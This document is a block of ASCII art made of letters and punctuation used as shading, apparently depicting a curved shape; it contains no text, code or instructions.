MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdddddyhhhhhhy+osssssymmNNmmmNMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNhmNNNNmdNmmmmmmmmmmmmmmmmmmmmmmmmmmNmmmmmmmmmmmmmmmmmNmmmmmNNNNmmmmNmmmmmmmmmmmmmmmNmNmmmmNNNNmmmmNmNNNNddmdmNNNNNNNNNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNNNNNNNMMMMMMMMNMMMMMNNNNNNNNNNNNNmmmNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNmmmmmmmNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNmmmmmmmmmmmmmmmmmmmmmmmNmNNmmmmmmmmmmmmNNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNmmNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNMMMMNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNNNNNNhsssshNNmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNNNmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNNddMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmmdss--/:/:::/+oshmddddddmmmmmmmmmmmmmmmmmmmmNNNNNNNNNNNNNNNNNNNmNNNNNNNNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdmmddmmmmmmmmdmddmmddddmmmmmmdmmmNNNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNddMNh:/:+sshmddddmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmNNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddmmmmddddddddddddddddddddddddddddddddddddddddddmmmmmdddmmmmdddddddddddddddddhhddddddddddddddddddddddddddmmmdmdmmdmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMddddyhhy+dy-/dddydmmmmmmmmmmNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddmmmdddddddddddddddddddddhddddddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhdddddddhhddddNNNMMMNhsdmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM::::/mymhmmmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddddhhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhddmdo::-:dddmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMmmmmddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddmmmdddddddddddmdddddddddddddddddddddddddhhddhddhhhhhhhhhhhhhhyyhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhdddhsoy/-/yo/ssshNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNdmMmNdhNmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddhhdhhhhhhhhhhhhhhhhhhhhhhhhhhyhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyhhhhhhhhhhhhhhhhhhhhdhydddds/-:yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNd+:.:mhdddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddddddddddddddddddddddddddddddddddddddddddhhhhdhhhhhhhhhhddhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhddddddNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNmhhhhs+-+shddddddmmmmmmmmmmmmmmmmmmmmmdddmmmmddddddddddhhhhhhhhhhhhhhdhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhddmmNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNMN+-//:hodddmmmmddmmmmmmmmmmmmmmmmmmdddddddddddddhhhhhhhhhhhyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhyyyyyhhhhhyyyyyhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyhhhhyyhhhhhhhhhhhhhddNNMMMNMMmNyoshdNNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMh:+ydohmmddmmmmmmmmmmmddddddddddddddddddddhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysyssyyyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhyyyyyyyyyyyyyyhhhhhhhhhhhhhhhddhddmmyo/-..:+NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdy:+mo/sdmmmmmmmmmmmmmmmdddddddddddddhhhhhhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysyyssssyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyssssssyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhdmNNNdy//+ohsoohNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN+/+odNmmmmmmmmmmmmmmmmddddddddhhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyssyysssssssssssssssssssssssssssssyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyssssssssssssyyssyyyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhdmmhyyhyo:`-+NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNNmo:/hdmmmmmmmmmmmmmdddddddhhhhhhhhhyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyysssssyyysssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyssssssssssyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhyyhhhhhhhhdmmNMNh:`./dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNN./NhdmmmmmmddddddddddddhhhhhhhyyyyyyyyyyyyyyyyyyyysssyyyssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssoosssssssssssssssssssssssssssssssssssssssssssssssysssssssssssyysssyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhddNMNo:/+yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMho+:sdddmmmmmmdddddhhdhhhhhhhyyyyyyyyyyyyyyyyssssysssssssssssssssssssssssssssssssssssssssssoosssssssooosssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyyyyyhhhhhhhhhhhhhhhhhhdmNmy-`:mNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMdy/`:ohmdmmmmmmmddddhhhhhhhhhyyyyyyyyssssssssssssssssssssssssssssssssssssssssssssssssooooooooooooooooooooooooooooosssoosssssssssssssssssssooooooooooooooossssssssoooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhyhmd/.`+yNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN/.os+hdmmmmmmmddddhhhhhhhhhhhyyyyyysssssssssssssssssssssssssssssssssssssssssoosooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssoooosoosssssssooooosssssssssssssssssssssssssssssssssyyyyyyyyyysyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhyyhdNh:`oMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMd`/yddmmmddddmdddhhhhhhhhhyyyyyyyyyyssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssosooooossooooooooooooossssssssssssssssssssssssssssssyyyyyssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhyyyyyhhyhhhhhhhhhhhhhhhhhhhhhhhhhhmd/`NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMmdms/sdddddddddddddhhhhhhhyyyyyyyyyyyyyyssssssssssssssoooooooooooooooooooooooooooooooooooooooooooooooo+++oooooooo+++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssyyysssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhys./MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMs--yyyydmmddddhddhhhhhhyyyyyyyyyyysssssssssssssssssssooooooooooooooooooooooooooooooooooooooooooooooooooooooo+++++++++++++++++ooooooooooooooooooooo+ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssssssssssyysssyyysssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhy+:+sMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMdosshddddddddhhhhhhhhhyyyyyyyyyyysssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooo++++++++++++++++++++++++++++++++ooooooooo+++++++++++++++++++++++++++++oooooooooooooooo++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhdddddddddhhhhhhhhhhhhy: +MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMy``oshhdddddddhhhhyyyyyyyyyyyysssssssssssssssssssssoooooooooooooooooooooooooooooooooooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo+++++++++ooooooooooooooooooooooooooooooooooooossssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhdddddddddddddddddddddddddhhhhhhhy/-MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMs/./yhhddddhhhhhhhyyyyyyyysssssssssssssssssssssoooooooooooooooo+++ooooooooooooooooooooooooo++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++//++++++////////////////++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooooosssssssssssssssssssoosssssssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyyyyyhhhhhhhdhhhdddhhhddddddddddddddddmmmmmmmmmmmmmmmmmmddddddddddhys+./sdmMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMd- :yhhddddhhhhhhhyyysssssssssssssssssssoooooooooooooooooooooooo+++++oooo++++++++oo+++++++++++++++++++++++++++++++++++++++++++++++++++++/////////////////////////////////////////////////////////+++++++++++++++++++++++++++++oooooooooooooooooooooooooooooooooooooooosssssooooooooosssoooooooooooossssssssssssssssssssssyyyyyyyyhhhhhhhhhhhhdddddddddddddmdddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddyy++::/hdMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMM` +hyddddddhhhhhhhyyysssssssssssssssssssooooooooooooooooooooooooo++++oooo++++++++++++++++++++++++++++++++++++++++++++++++////////////////////////////////////////////////////////////////////////////////+++++++++++++++++++++++o+++++++++++oooooooooooooooooooooooooooooooooooooooooooooooooooooosssssssssssssssyysssyyyyyyyyhhhhhhhddddddddddddddddddmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddhyyyo:``-yMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMd`.yyhdddddhhhhhhyyyyssssssssssssssssssssooooooooooooooooooooooooo++++++++++++o+++++++++++++++++++++++++++//////////////////////////////////////////://::://::::::::///////::::::::://////////////////////++++++++++++++++++++++++++++++++++oo+ooooooooooooooooooooooooooooooooooooosssossoooooooosssssssssssssyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmdddhhhhyys+-.dMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMs-oyyhhhhhhhhhhhyyyyyssssssssssssssssssssooooooooooooooooooooooo+++++++++++++++++++++++++++++++++++++++///////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::://///////////////////////++++++++++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooossssssssssooosssssssssssssyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhddddddddmmdmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddhhhhydmhNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM+/syhhhhhhhyyyyyyyyyyssssssssssssssssssssoooooooooooooooooooooooo++++++++++++++++++++++++++++++++++/////////////////////////////::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////++++++++++++++++++++++++ooooooooooooooooooooooooooooooooooooosoooooossosssooooosssssssssssssssssssssssssssssssssssssssyyyyyyyyyyyhhhhddddddddddddddmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmddddddddddhhddddhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMy/oyyyhyyyyyyyyyyyyyyysssssssssssssssssooooooooooooooooooooooooooo+++++++++++++++++++++++++++////////////////////////////:::::////::::::::::::::::::::::::::::::::::::::::::::::::::://////////://////////////////////////+++++++++++++++oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooosoooooooooooooosssssssssssssyyyyyyyyhhhhhhddddddddddddddddmmmmmmmmmmmmmmmmdddddddddddddddddddddddhhhdddmdhyNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMNmy++syyhyyyyyyyyyyyyyyysssssssssssssssosssossssooooooooooooooooooooo+++++++++++++++++++++++/////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////////////+++++++++++++++ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooossssssssssssyyyyyyyyhhhhhhhdddddddddddddddddddddmmmmmdddddddddddddddddddddddddddddddddhddmmdhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMM/.oyyyyyyyyyyyyyyssssssssssssssssssssssoooooosssoooooooooooooooooooooo+++++++++++++++++//////////////////////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////////////+++++++++++++++++oooo+oo+++++ooooooooooooooooooooooooooooooooooooooooooo+++++++o+o+ooooooooooooosssssssssyyyyyyyyyyyyyhhhhhhhddddddddddddddddddddmmmmdmddddddddddddddddddddddddddddhhhhdddhddhdNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMN-:syyyyyyyyysssssssssssssssssssssssssssoooooossoooooooooooooooooooooooo+++++++++++++++///////////////:::///:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://:///////////////////////////////+++++++++++++++++++++++++++++++++++++++o+++++++++++++++++++++++++++++++++++++++o+ooooooooooooooossssssssssssyyyyyyyyyyyyyhhhhhhdddddddmmmmddmmmmddmmmmmmmmmdddddddddddddddddddhhhhddhhhdddddhyyosNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMh -ssyyyyyysssssssssssssssssssssssssssssoooooooooooooooooooooooooooooooooo++++++++++++///////////////:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::://////////////////////////////++///++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++oo+ooooooooooooosssssssssssyssyyyyyyyyyyyyyyhhhhdddddddmmmmmmmmmmmmmmmmmmmmmmddddddhhhddddddhhhhhhhdddhdddddhyso:`:oNMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
